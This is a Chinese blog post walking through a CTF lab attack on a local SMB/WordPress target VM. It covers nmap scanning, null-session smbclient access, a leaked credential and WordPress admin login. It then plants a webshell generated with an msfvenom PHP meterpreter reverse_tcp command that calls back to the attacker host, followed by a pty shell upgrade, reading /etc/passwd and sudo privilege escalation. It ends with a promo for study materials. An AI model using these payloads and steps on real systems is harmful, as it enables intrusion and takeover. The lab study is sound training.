前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-
专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
SMB介绍
实验环境
信息探测
分析探测结果
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
2.针对SMB协议远程溢出漏洞进行分析
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
3.寻找突破点,目标登录后台,上传webshell
4.优化终端
5.查找用户名:cat /etc/passwd
6.查找密码:在共享目录下的敏感文件,提升权限
SMB介绍
SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件
实验环境
kali 192.168.20.128
靶机 192.168.20.129
链接:https://pan.baidu.com/s/1inGR9A628icBnqcsHCnPYQ
提取码:4c5l
信息探测
nmap -sV ip 挖掘开放服务信息
nmap -A -v -T4 挖掘靶场全部信息
nmap -sV 192.168.20.129
分析探测结果
每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
smbclient -L ip
smbclient ‘\\ip\share$’
print 和 I P C 和IPC 和IPC没有什么利用价值
get 敏感文件
发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)
远程登录3306端口不行
远程登录22端口不行
2.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号
发现没有远程溢出漏洞
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
打开查看
利用密码登录
登陆网站
3.寻找突破点,目标登录后台,上传webshell
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw
制作webshell.php
启动监听
上传webshell
update file
获取反弹shell
选择twentyfifteen的原因
http://192.168.20.129/wordpress/wp-content/themes/twentyfifteen/404.php
4.优化终端
python -c “import pty;pty.spawn(‘/bin/bash’)”
5.查找用户名:cat /etc/passwd
6.查找密码:在共享目录下的敏感文件,提升权限
su 用户名
12345是之前deets.txt文件里的密码
sudo-l
sudo su
查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)
最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
扫码领取
1169
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
